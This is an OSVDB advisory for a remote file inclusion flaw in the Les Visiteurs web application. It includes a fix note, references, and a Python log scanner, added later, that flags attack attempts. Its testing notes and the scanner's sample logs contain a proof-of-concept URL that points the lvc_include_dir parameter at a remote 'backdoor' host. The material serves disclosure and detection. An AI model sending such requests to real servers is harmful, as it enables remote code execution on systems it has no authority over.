Les Visiteurs config.inc.php Arbitrary File Inclusion

2003-10-25T00:00:00
ID OSVDB:3586
Type osvdb
Reporter OSVDB
Modified 2003-10-25T00:00:00

Description

Vulnerability Description

Les Visiteurs contains a flaw that allows a remote attacker to include arbitrary files when requesting "config.inc.php". The issue is due to the "lvc_include_dir" parameter not being sanitized, which allows the attacker to point it at an arbitrary configuration file hosted on a remote, untrusted machine. Such a configuration file could be crafted to contain arbitrary commands and options, which will be read and acted upon on the vulnerable machine.

Solution Description

Upgrade to version 2.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[victim]/include/config.inc.php?lvc_include_dir=http://backdoor/
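As an added example (not part of the OSVDB record), the following Python script shows how a defender can spot the request pattern above in web server access logs: it parses combined-format log lines, isolates requests for config.inc.php, and flags any "lvc_include_dir" value that names a remote URL. The log lines are constructed samples, not captured traffic.

```python
"""Flag remote-file-inclusion attempts against Les Visiteurs' config.inc.php
in Apache/nginx combined-format access logs (sample lines are constructed)."""
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format: client IP, identity, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Script and parameter named in the advisory.
VULN_SCRIPT = "config.inc.php"
VULN_PARAM = "lvc_include_dir"
# A value carrying a URL scheme ("http://backdoor/" in the advisory) means the
# include path is being redirected to a remote host.
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def analyse_request(target: str):
    """Return a finding for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_SCRIPT):
        return None
    # parse_qs percent-decodes, so "http%3A%2F%2F..." is caught as well.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get(VULN_PARAM, []):
        if REMOTE_RE.match(value):
            return {"kind": "remote_file_inclusion", "value": value}
    return None


def scan_log(lines):
    """Return (client IP, finding) pairs for every suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        finding = analyse_request(m.group("target"))
        if finding:
            findings.append((m.group("ip"), finding))
    return findings


# Constructed sample log: two RFI attempts (one percent-encoded) and two benign hits.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Oct/2003:10:12:01 +0000] "GET /include/config.inc.php?lvc_include_dir=http://backdoor/ HTTP/1.0" 200 512',
    '198.51.100.7 - - [25/Oct/2003:10:12:09 +0000] "GET /include/config.inc.php?lvc_include_dir=HTTP%3A%2F%2Fbackdoor%2F HTTP/1.0" 200 512',
    '192.0.2.10 - - [25/Oct/2003:10:13:00 +0000] "GET /index.php HTTP/1.1" 200 2048',
    '192.0.2.11 - - [25/Oct/2003:10:13:05 +0000] "GET /include/config.inc.php HTTP/1.1" 200 10',
]

if __name__ == "__main__":
    for ip, finding in scan_log(SAMPLE_LOG):
        print(f"{ip}: {finding['kind']} via {VULN_PARAM}={finding['value']}")
```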

References:

Vendor URL: http://chezwam.net/main/publications/lesvisiteurs/
Secunia Advisory ID: 10079
Related OSVDB ID: 2717
Other Advisory URL: http://www.securityspace.com/smysecure/catid.html?id=11911
Nessus Plugin ID: 11911
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-10/0262.html
Bugtraq ID: 8902